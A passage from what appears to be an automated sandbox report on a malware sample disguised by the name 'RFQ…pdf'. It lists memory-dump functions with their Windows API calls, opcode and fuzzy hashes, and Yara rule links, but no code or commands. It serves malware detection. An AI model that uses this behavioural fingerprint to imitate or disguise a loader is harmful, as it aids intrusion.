                              • Opcode ID: d75a4ea4117d701bffa7db70ab60845102b4cdcb1423347ce13ceef236bf8e09
                              • Instruction ID: 0738943c8267b223fcb49c8584f9e39c1502eba563403186051262d9a8935e46
                              • Opcode Fuzzy Hash: d75a4ea4117d701bffa7db70ab60845102b4cdcb1423347ce13ceef236bf8e09
                              • Instruction Fuzzy Hash: 06219AB6204289CFDB769F29DC407DE7BA2EF4A364F11442AED099B320D3305A02DF01
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B9685, Relevance: 1.6, APIs: 1, Instructions: 63memorynativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtAllocateVirtualMemory.NTDLL(-000000015FA4E159,?,A3C14262), ref: 020B9750
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateMemoryVirtual
                              • String ID:
                              • API String ID: 2167126740-0
                              • Opcode ID: 22911c60604f332e1153bf77ee77546d90e7cba06063fe8bf7ed6860df522d26
                              • Instruction ID: 10988ec11dcbaf8d45d15b01a114a4e150ee708af4c8a353aa64b69f52e98ea2
                              • Opcode Fuzzy Hash: 22911c60604f332e1153bf77ee77546d90e7cba06063fe8bf7ed6860df522d26
                              • Instruction Fuzzy Hash: DB2159B6204289CFEB769F19CC507DD7BA6AF8A368F114529ED4D9B720D3309A02DF41
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020BA6B9, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: 9a758b032016fed8f2979aa245e8b869e6b265f44bd449e2026fc53831623b6f
                              • Instruction ID: bf63961a5068aee811f2552c199bf92ae215e7b0de1ae2c1c3b0d77726da1e5d
                              • Opcode Fuzzy Hash: 9a758b032016fed8f2979aa245e8b869e6b265f44bd449e2026fc53831623b6f
                              • Instruction Fuzzy Hash: 24A0127120410401A150315440C468E00010BC0311BF0C00595411F10CCE45852977E5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B0C79, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: EnumWindows
                              • String ID: \ %.
                              • API String ID: 1129996299-2901931214
                              • Opcode ID: 72197c9bf61aeba065f55a388b0222f48dcac645fc0d181e69e7459c32710f9a
                              • Instruction ID: 770b6ee7363fe959b8af9d39764c9b48be04926cef5e5be5d99902fdeb38946c
                              • Opcode Fuzzy Hash: 72197c9bf61aeba065f55a388b0222f48dcac645fc0d181e69e7459c32710f9a
                              • Instruction Fuzzy Hash: 6911AFBDB0936887C6379F2D5C581CB6FF76FE2324F348942999886758C2B06D06D205
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B0CF9, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: EnumWindows
                              • String ID: \ %.
                              • API String ID: 1129996299-2901931214
                              • Opcode ID: 2074f8b64982ebf4ed2721c2796ab4965d6eb9980d270b41cfba211d056e7f1c
                              • Instruction ID: 81fa0c92a4f68d86e9665d8ddcb57d2d3a7f778d4eb50fda0f538db28ca86249
                              • Opcode Fuzzy Hash: 2074f8b64982ebf4ed2721c2796ab4965d6eb9980d270b41cfba211d056e7f1c
                              • Instruction Fuzzy Hash: BCF02B7D6057484BCB37DE158C642DB6E9B6FE1310F718862DD1C8B314D2B15E03D642
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B0D6D, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: EnumWindows
                              • String ID: \ %.
                              • API String ID: 1129996299-2901931214
                              • Opcode ID: 37bd8cab0c8943140fbfb81b52d44dd63d388f94e6e043584ccdcf766d7be36e
                              • Instruction ID: d26d3abff43ed92c4b619669b35a94b9480cbe21c582ea3b18a4cfa9ceacb512
                              • Opcode Fuzzy Hash: 37bd8cab0c8943140fbfb81b52d44dd63d388f94e6e043584ccdcf766d7be36e
                              • Instruction Fuzzy Hash: C4F0A77D70164C4BCB75DE1A8CA46DB7AABAFD5320F30C425DD1C9B718D6B08A138642
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020BBAE2, Relevance: 1.6, APIs: 1, Instructions: 99libraryCOMMON
                              Download Yara Rule
                              APIs
                              • LoadLibraryA.KERNELBASE(?), ref: 020BBCE5
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: LibraryLoad
                              • String ID:
                              • API String ID: 1029625771-0
                              • Opcode ID: 8061766e9b5aea61632ac0a18e5c6c95e0cecb172e187d8b697f430232836b3c
                              • Instruction ID: 3869451f05324c6c1ace3d9209c5aba85c30c12e4cccd4f5154bf75069e68c63
                              • Opcode Fuzzy Hash: 8061766e9b5aea61632ac0a18e5c6c95e0cecb172e187d8b697f430232836b3c
                              • Instruction Fuzzy Hash: 09318E75B083A9CBCB3B9E6489C86FE7BB1BF09314F54042BDD4A87606CB705942EB01
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B9135, Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON
                              Download Yara Rule
                              APIs
                              • CreateFileA.KERNELBASE(?,380C6702), ref: 020B92BD
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateFile
                              • String ID:
                              • API String ID: 823142352-0
                              • Opcode ID: bdd0f8599f751703b7a7a6752467a73afc5f0bdfeb6019116de2a85abb08d68e
                              • Instruction ID: 308dbe04814af3d06803405332204dea1f5c3ff5e4123b8c9c8fc2cb1d4005cf
                              • Opcode Fuzzy Hash: bdd0f8599f751703b7a7a6752467a73afc5f0bdfeb6019116de2a85abb08d68e
                              • Instruction Fuzzy Hash: A411C0B240C345DFDB289F318D156EEB3F2AFA0780F56451E98CA97250C7704581DB03
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B9198, Relevance: 1.5, APIs: 1, Instructions: 46fileCOMMON
                              Download Yara Rule
                              APIs
                              • CreateFileA.KERNELBASE(?,380C6702), ref: 020B92BD
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateFile
                              • String ID:
                              • API String ID: 823142352-0
                              • Opcode ID: 7ca88e4f9a0dfb41950ee1c2bdb535e21442c71d126ac0db2bf9aec008ab1f8a
                              • Instruction ID: 04df02b2c92e3197054b699fe89856983b9d6d3f31946e012e640a53be7ce75a
                              • Opcode Fuzzy Hash: 7ca88e4f9a0dfb41950ee1c2bdb535e21442c71d126ac0db2bf9aec008ab1f8a
                              • Instruction Fuzzy Hash: 0F11023250C3849FDB79AF3089546EEB7F6AF64380F9A061E9CCA97180C7714581CB02
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B91F5, Relevance: 1.5, APIs: 1, Instructions: 42fileCOMMON
                              Download Yara Rule
                              APIs
                              • CreateFileA.KERNELBASE(?,380C6702), ref: 020B92BD
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateFile
                              • String ID:
                              • API String ID: 823142352-0
                              • Opcode ID: ce0a3bdaea3142b8ff90a92afef202d944fffeba1d12ef898c7e5b36cd51da96
                              • Instruction ID: f9427b7f00b3e0a808b6d9b040a8ccbec7cca79dbe7b9bc286234c17ab9304b3
                              • Opcode Fuzzy Hash: ce0a3bdaea3142b8ff90a92afef202d944fffeba1d12ef898c7e5b36cd51da96
                              • Instruction Fuzzy Hash: 6401247641C3049FCB389F34CD18AEEB7F6AFA0380F16061E8DCA52290C7B50982DB12
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B8DA9, Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                              Download Yara Rule
                              APIs
                              • TerminateProcess.KERNELBASE ref: 020B8F3D
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: ProcessTerminate
                              • String ID:
                              • API String ID: 560597551-0
                              • Opcode ID: ad1ce1a65131295882d1e2b9f8e983ea5818198f2c51976d45fb0374ce0d656c
                              • Instruction ID: bceaca5c60fd379f7c11ab43b70c81269e4f32386f5fa1a30ecbd67208657419
                              • Opcode Fuzzy Hash: ad1ce1a65131295882d1e2b9f8e983ea5818198f2c51976d45fb0374ce0d656c
                              • Instruction Fuzzy Hash: 97F024A6C4C301CEDA335970C84A3ECBBEA9E26304F548855CAC241361C2146283EB07
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B8E25, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                              Download Yara Rule
                              APIs
                              • TerminateProcess.KERNELBASE ref: 020B8F3D
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: ProcessTerminate
                              • String ID:
                              • API String ID: 560597551-0
                              • Opcode ID: 83277a43b2c2abfe71ce2139769f809fe79214312b1ebd77aeb39e78391153be
                              • Instruction ID: f14d80a1b3d053d3d6a27e545e06dced11f130588d8da771eb8e3b15fc4dd949
                              • Opcode Fuzzy Hash: 83277a43b2c2abfe71ce2139769f809fe79214312b1ebd77aeb39e78391153be
                              • Instruction Fuzzy Hash: A1F024A680C201CEDA325970888A3D8BBE6AE22300F554855DAC201261C2146283EB43
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B8DB5, Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                              Download Yara Rule
                              APIs
                              • TerminateProcess.KERNELBASE ref: 020B8F3D
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: ProcessTerminate
                              • String ID:
                              • API String ID: 560597551-0
                              • Opcode ID: 75446043c87a9baf2a3de4db039149e945ad3bf2eebcb3b531445de76004f40c
                              • Instruction ID: 40cae824eaaf3036b63614e7747fa6836f76498bedf7a811b7410bb72907e639
                              • Opcode Fuzzy Hash: 75446043c87a9baf2a3de4db039149e945ad3bf2eebcb3b531445de76004f40c
                              • Instruction Fuzzy Hash: ADE0E5B951C305CEDB331A75D80A2EC7BE99F47340F55C94A9AD201260836836C2EB1B
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B9241, Relevance: 1.5, APIs: 1, Instructions: 28fileCOMMON
                              Download Yara Rule
                              APIs
                              • CreateFileA.KERNELBASE(?,380C6702), ref: 020B92BD
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateFile
                              • String ID:
                              • API String ID: 823142352-0
                              • Opcode ID: 5fdf16e27cc5c5cc593c0356e80ec4c18695b681e0dc54c6f1100232e6541120
                              • Instruction ID: a27bc02c67ea1063d1a9fc49537966f793ff443ebc2396f07ad81892261813e5
                              • Opcode Fuzzy Hash: 5fdf16e27cc5c5cc593c0356e80ec4c18695b681e0dc54c6f1100232e6541120
                              • Instruction Fuzzy Hash: 90F05576C2C35C8ACB398F285C247DA3BA3AFA03C0F02432F5E1A272C08A711941D914
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B8E31, Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                              Download Yara Rule
                              APIs
                              • TerminateProcess.KERNELBASE ref: 020B8F3D
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: ProcessTerminate
                              • String ID:
                              • API String ID: 560597551-0
                              • Opcode ID: 2cb0b7cd75cfe8dc1a96246704152f21330f3c49fe84f4489291cab0ed1bb0ee
                              • Instruction ID: c3e9dfb61885ca2bdc4b9f1a19b8a0ef53dacb6844602171e5b66fdb031a9cbe
                              • Opcode Fuzzy Hash: 2cb0b7cd75cfe8dc1a96246704152f21330f3c49fe84f4489291cab0ed1bb0ee
                              • Instruction Fuzzy Hash: 0AE02BB9608301CEDA332A71D4093ECBBE49F47740F458849D9D101360836436C2EB13
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Non-executed Functions

                              Function 020BDB82, Relevance: 3.0, Strings: 2, Instructions: 481COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: LibraryLoadMemoryProtectVirtual
                              • String ID: 7U%o$Oqc"
                              • API String ID: 3389902171-3960296939
                              • Opcode ID: df70116b46bc365d7e6af49fe2d46eae34cda500fd4013191d23855170d4cc32
                              • Instruction ID: 6f00dd60d83559cafed952df5f7d9d7ed8c4b436cb017ee8c89423edcca4ca20
                              • Opcode Fuzzy Hash: df70116b46bc365d7e6af49fe2d46eae34cda500fd4013191d23855170d4cc32
                              • Instruction Fuzzy Hash: 21221D719083C58FDB76CF38C8987DABBE1AF16310F89C29AC8998F296D3348545D716
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020BD872, Relevance: 2.9, Strings: 2, Instructions: 377COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 7U%o$Oqc"
                              • API String ID: 0-3960296939
                              • Opcode ID: af0c9841fd9bfd20f3ae34ce56da187bf6a56b79a0f5a78016c4c303a23943ba
                              • Instruction ID: 28f58060211ad6f0030909349d495803a77f951fe696eac8662b449672b803b7
                              • Opcode Fuzzy Hash: af0c9841fd9bfd20f3ae34ce56da187bf6a56b79a0f5a78016c4c303a23943ba
                              • Instruction Fuzzy Hash: B3F1D671508385CFCB76CF38C8887DABBE1AF56320F49829AC8994F2A6D3318545DB16
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B98DD, Relevance: 1.5, Strings: 1, Instructions: 231COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: !5]
                              • API String ID: 0-1504148834
                              • Opcode ID: ebeac3cd3c37f9ea23c5b3558b41aed01cdbbe0dcfedc9064fb9a5072f0656fe
                              • Instruction ID: bad443650e4242f6d4dc9c852a16db15e5beb7bf4415d152c4af001a4dd5a783
                              • Opcode Fuzzy Hash: ebeac3cd3c37f9ea23c5b3558b41aed01cdbbe0dcfedc9064fb9a5072f0656fe
                              • Instruction Fuzzy Hash: 2F913271604389DFDB7A8E25CE51BEE77E5AF49340F01842EDE8A9B260E7344A00DF12
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B9A01, Relevance: .3, Instructions: 252COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: LibraryLoad
                              • String ID:
                              • API String ID: 1029625771-0
                              • Opcode ID: 7b039da34e5ac8e0501ff25e7c81ffb65822e1595c299fc70041cef67838f90f
                              • Instruction ID: cb74879cb8f72b2cdb2121a668a0c885d1490b41d8081f22a341430143bf982d
                              • Opcode Fuzzy Hash: 7b039da34e5ac8e0501ff25e7c81ffb65822e1595c299fc70041cef67838f90f
                              • Instruction Fuzzy Hash: 4AB1EF3160438ADFDF7A9E24CD51BEE77A2AF45340F41842EDD8AAB210E7354A40DF12
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B99BD, Relevance: .2, Instructions: 230COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 347ba7ec16c3fd5c96e44328b5a0be45db2414fc148a37359a8a3dc6a7f32eee
                              • Instruction ID: 1fc492da665caea50003a6b3ddbe6d93f185b35bf0f1174af7ca6e4a0e35ac54
                              • Opcode Fuzzy Hash: 347ba7ec16c3fd5c96e44328b5a0be45db2414fc148a37359a8a3dc6a7f32eee
                              • Instruction Fuzzy Hash: 67A12E31608389DFDB7A8E24CD51BEE77A2AF4A340F45442ECD8A9B251E7344A40DF22
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B99DD, Relevance: .2, Instructions: 225COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8f24f6f832bbcfb924e7fb48549e472c960cffd024f707ad54b17abd62b05df1
                              • Instruction ID: a8cbc4993c8ff826966095321f40b4270e47eab2eb1ec91d8135c8eed5d8def1
                              • Opcode Fuzzy Hash: 8f24f6f832bbcfb924e7fb48549e472c960cffd024f707ad54b17abd62b05df1
                              • Instruction Fuzzy Hash: 34910E7160438ADFDB7A8E25CD51BEE77E2AF4A340F41442EDD8A9B250E7344A40DF22
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B9A35, Relevance: .2, Instructions: 223COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: LibraryLoad
                              • String ID:
                              • API String ID: 1029625771-0
                              • Opcode ID: 00d77b3b727eada8ac7961711fd8486ce4204806fa82e0b6d279003ae262a72e
                              • Instruction ID: 2aabd582fc93eb441a761e85a455952ca1417e0906079dbad462480452de24c9
                              • Opcode Fuzzy Hash: 00d77b3b727eada8ac7961711fd8486ce4204806fa82e0b6d279003ae262a72e
                              • Instruction Fuzzy Hash: 72A10E3160838ADFDB798E25CD51BEE77A2AF49340F45442EDD8AAB251E7344A40DF22
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B9A1D, Relevance: .2, Instructions: 221COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3f4ce2f89339aafc48f89552b59d72e0b982300de57c7620428ff40ef82ce9fb
                              • Instruction ID: 500c8614a9b632d2a26591fa4421ffe5be4401e98220fb9b4fc5c5b05b794462
                              • Opcode Fuzzy Hash: 3f4ce2f89339aafc48f89552b59d72e0b982300de57c7620428ff40ef82ce9fb
                              • Instruction Fuzzy Hash: AA911E7160438ADFDB798E25CD51BEE77E2AF49340F41842EDD8AAB210E7344A41DF12
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020BA0B5, Relevance: .2, Instructions: 220COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c160b318268280f231788933634df4a5db6a9e4eacefe7897fbb9cf59c12301e
                              • Instruction ID: 55d0a7f42f1e6a7e377bbb9587548f2735a4465906e7648bce9820e9d7e0db3a
                              • Opcode Fuzzy Hash: c160b318268280f231788933634df4a5db6a9e4eacefe7897fbb9cf59c12301e
                              • Instruction Fuzzy Hash: 0C91FE31608389DFDF7A9E25CD51BEE77A2AF45340F01842EDD8AAB211E7354A41DF12
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B99D0, Relevance: .2, Instructions: 220COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID: LibraryLoad
                              • String ID:
                              • API String ID: 1029625771-0
                              • Opcode ID: ca0a3f651c69cfefbe065031784d5f40038c95f55d08eb7518b4c0f49ac713ea
                              • Instruction ID: 03d722fd8dfb68682405891ba0789dbf1939c3214357ce4f6bdc0e329f17fd8f
                              • Opcode Fuzzy Hash: ca0a3f651c69cfefbe065031784d5f40038c95f55d08eb7518b4c0f49ac713ea
                              • Instruction Fuzzy Hash: D291FD3160438ADFDF799E25CD51BEE77A2AF49340F41842EDD8AAB250E7344A40DF22
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B9A29, Relevance: .2, Instructions: 218COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c9a06fafa97e999e1af794eb6ade82ee1f65b68b3ff3ff1833aeca38a60417bd
                              • Instruction ID: a94ebef660572a473cde8defe2783d78e0a853b50441d6996297706365c75c04
                              • Opcode Fuzzy Hash: c9a06fafa97e999e1af794eb6ade82ee1f65b68b3ff3ff1833aeca38a60417bd
                              • Instruction Fuzzy Hash: 23910D7160438ADFDB799E25CD51BEE77E2AF49340F41842EDD8AAB210E7344A40DF52
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020BA128, Relevance: .2, Instructions: 212COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 395f74b05f67caf603d355fe9256e5cffc57ebe9ad0cb5ebdfefd1b679c12fcd
                              • Instruction ID: 002d6ccc6b63f95c4505c86e9e4deedda8e2bc1f2a82706ebddaebc603b56bf2
                              • Opcode Fuzzy Hash: 395f74b05f67caf603d355fe9256e5cffc57ebe9ad0cb5ebdfefd1b679c12fcd
                              • Instruction Fuzzy Hash: 9191EE7150838ADFDF7A8E25CD51BEE77A2AF45340F05842EDD8AAB211E7354A40EF12
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020BA09D, Relevance: .2, Instructions: 209COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a46365ea97e282451e50a3e0b858921ab48780ddd64a3a6a387ffe38c76d6b7f
                              • Instruction ID: d7eda0e129d1b96df68c685d149bdb02590892b715ef43f14896741758f4c210
                              • Opcode Fuzzy Hash: a46365ea97e282451e50a3e0b858921ab48780ddd64a3a6a387ffe38c76d6b7f
                              • Instruction Fuzzy Hash: F681FF71608389DFDB7A8E25CE51BEE77E5AF45340F01442EDE8AAB210E7344A40DF56
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B9979, Relevance: .2, Instructions: 208COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 19070f7e61629d9b2234380c0ced58887fcf6dbd3b5515961f38ded04fb0954c
                              • Instruction ID: 4c36a4614a48661ddc8b06e7634d6e0adc3e3bfd8beeb91f195bab5726aa741f
                              • Opcode Fuzzy Hash: 19070f7e61629d9b2234380c0ced58887fcf6dbd3b5515961f38ded04fb0954c
                              • Instruction Fuzzy Hash: 99810071604389DFDB7A8E25CD51BEE77E5AF4A340F01442EDE8A9B210E3345A40DF12
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B99E9, Relevance: .2, Instructions: 208COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a856c0dbee9d3fe68629c3e0db3837aa670258033124061c7fc4b8d23fa985f5
                              • Instruction ID: 7bae01bf68a0d94cfc5591c1cdf5a18f51d3328670d4cebcff0b106723c4ae22
                              • Opcode Fuzzy Hash: a856c0dbee9d3fe68629c3e0db3837aa670258033124061c7fc4b8d23fa985f5
